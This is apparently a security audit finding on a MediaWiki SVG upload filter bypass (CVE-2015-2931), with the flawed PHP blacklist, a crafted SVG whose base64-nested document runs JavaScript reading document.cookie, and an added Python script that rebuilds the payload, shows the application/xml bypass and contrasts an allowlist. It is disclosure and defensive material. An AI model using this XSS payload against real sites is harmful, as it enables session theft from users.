FINDING ID: iSEC-WMF1214-11
DESCRIPTION: When uploading an SVG file, it is possible to bypass the validation filters and upload an
SVG file that executes JavaScript when rendered. The SVG validation is a blacklist-based approach and
contains protections against numerous techniques for embedding JavaScript in SVG files; however, the
protections against nested SVG files are inadequate because the MIME type blacklist is incomplete.
Specifically, data: URIs whose MIME type contains image/svg or text/xml are blacklisted, but
application/xml is not, and an application/xml data: URI is sufficient to reference a nested SVG file
containing JavaScript.
# /includes/upload/UploadBase.php

# href with embedded svg as target
if ( $stripped == 'href' && preg_match( '!data:[^,]*image/svg[^,]*,!sim', $value ) ) {
    wfDebug( __METHOD__ . ": Found href to embedded svg "
        . "\"<$strippedElement '$attrib'='$value'...\" in uploaded file.\n" );
    return true;
}

# href with embedded (text/xml) svg as target
if ( $stripped == 'href' && preg_match( '!data:[^,]*text/xml[^,]*,!sim', $value ) ) {
    wfDebug( __METHOD__ . ": Found href to embedded svg "
        . "\"<$strippedElement '$attrib'='$value'...\" in uploaded file.\n" );
    return true;
}
Listing 1: Blacklist filtering for data: URIs with specific MIME types.
The following example SVG file contains a nested SVG file embedded within a data: URI. The nested
SVG file contains executable JavaScript.
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <use xlink:href="data:application/xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIj4KPGRlZnM+CjxjaXJjbGUgaWQ9InRlc3QiIHI9IjUwIiBjeD0iMTAwIiBjeT0iMTAwIiBzdHlsZT0iZmlsbDogI0YwMCI+CjxzZXQgYXR0cmlidXRlTmFtZT0iZmlsbCIgYXR0cmlidXRlVHlwZT0iQ1NTIiBvbmJlZ2luPSdhbGVydChkb2N1bWVudC5jb29raWUpJwpvbmVuZD0nYWxlcnQoIm9uZW5kIiknIHRvPSIjMDBGIiBiZWdpbj0iMXMiIGR1cj0iNXMiIC8+CjwvY2lyY2xlPgo8L2RlZnM+Cjx1c2UgeGxpbms6aHJlZj0iI3Rlc3QiLz4KPC9zdmc+#test"/>
</svg>
Listing 2: Specially-crafted SVG file with a nested SVG file containing executable JavaScript code.
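The following Python is an added example for this finding; it is not part of the iSEC report or of MediaWiki's own code. It mirrors the two preg_match patterns from Listing 1 (PHP's !...!sim flags correspond to re.S | re.I | re.M), wraps the nested SVG from Listing 2 (shown decoded) in the outer <use> wrapper for three MIME types, and checks which wrappers the blacklist rejects. It also decodes the data: URI to show the on* handlers the nested document carries, and contrasts the blacklist with an allowlist that permits only local fragment references and base64 raster images. The allowlist pattern and all function names are assumptions made for illustration, not the fix the project shipped.

```python
import base64
import re
import xml.etree.ElementTree as ET
from urllib.parse import unquote_to_bytes

# The nested SVG that Listing 2 carries base64-encoded inside its data: URI,
# decoded here so the payload stays readable.
INNER_SVG = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<defs>
<circle id="test" r="50" cx="100" cy="100" style="fill: #F00">
<set attributeName="fill" attributeType="CSS" onbegin='alert(document.cookie)'
onend='alert("onend")' to="#00F" begin="1s" dur="5s" />
</circle>
</defs>
<use xlink:href="#test"/>
</svg>
"""

OUTER_TEMPLATE = (
    '<svg xmlns="http://www.w3.org/2000/svg" '
    'xmlns:xlink="http://www.w3.org/1999/xlink">'
    '<use xlink:href="data:{mime};base64,{b64}#test"/></svg>'
)


def build_outer_svg(mime: str) -> str:
    """Wrap INNER_SVG in an outer SVG whose <use> targets a data: URI of the given MIME type."""
    b64 = base64.b64encode(INNER_SVG.encode("utf-8")).decode("ascii")
    return OUTER_TEMPLATE.format(mime=mime, b64=b64)


# The two blacklist patterns from Listing 1, translated verbatim from PHP.
BLACKLIST = [
    re.compile(r"data:[^,]*image/svg[^,]*,", re.S | re.I | re.M),
    re.compile(r"data:[^,]*text/xml[^,]*,", re.S | re.I | re.M),
]


def blacklist_rejects(href: str) -> bool:
    """True when either Listing 1 pattern matches the href value."""
    return any(p.search(href) for p in BLACKLIST)


# Hypothetical allowlist (assumption, not MediaWiki's code): accept only a local
# fragment reference or a base64 data: URI of a raster image type.
ALLOWLIST = re.compile(
    r"^(?:#\S*|data:image/(?:png|jpeg|gif);base64,[A-Za-z0-9+/]+=*)$", re.I
)


def allowlist_rejects(href: str) -> bool:
    """True when the href is not one of the explicitly permitted shapes."""
    return ALLOWLIST.match(href) is None


def href_values(svg_text: str):
    """Yield every href / xlink:href attribute value in the document, in any namespace."""
    for elem in ET.fromstring(svg_text).iter():
        for name, value in elem.attrib.items():
            if name.rsplit("}", 1)[-1].lower() == "href":
                yield value


def upload_rejected(svg_text: str, check) -> bool:
    """Apply a per-href check to the whole document; any hit rejects the upload."""
    return any(check(v) for v in href_values(svg_text))


def decode_data_uri(href: str) -> bytes:
    """Return the body of a data: URI (base64 or percent-encoded), ignoring any #fragment."""
    uri = href.split("#", 1)[0]
    if not uri.lower().startswith("data:"):
        raise ValueError("not a data: URI")
    header, _, body = uri[5:].partition(",")
    if header.lower().endswith(";base64"):
        return base64.b64decode(body)
    return unquote_to_bytes(body)


def event_handlers(svg_text: str):
    """Sorted names of on* attributes found anywhere in an SVG document."""
    names = set()
    for elem in ET.fromstring(svg_text).iter():
        for name in elem.attrib:
            local = name.rsplit("}", 1)[-1]
            if local.lower().startswith("on"):
                names.add(local)
    return sorted(names)


if __name__ == "__main__":
    for mime in ("image/svg+xml", "text/xml", "application/xml"):
        outer = build_outer_svg(mime)
        print(f"{mime:16} blacklist rejects: {upload_rejected(outer, blacklist_rejects)!s:5} "
              f"allowlist rejects: {upload_rejected(outer, allowlist_rejects)}")
    nested = decode_data_uri(next(href_values(build_outer_svg("application/xml")))).decode("utf-8")
    print("handlers in nested document:", event_handlers(nested))
```

Running the block shows the image/svg+xml and text/xml wrappers rejected by the blacklist while the application/xml wrapper passes, which is the bypass; the allowlist rejects all three because none of them is a local fragment or a raster image, which is why an allowlist on href targets is the more durable check.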
During testing, this exploit was only confirmed against the Firefox browser. Testing indicates that other
browsers do not load nested SVG files referenced this way.
Patch (based on top of patch for T85349, ):
- 1.24:
- 1.23:
- 1.19:
Affected Versions: (needed)
Type: xss
CVE: CVE-2015-2931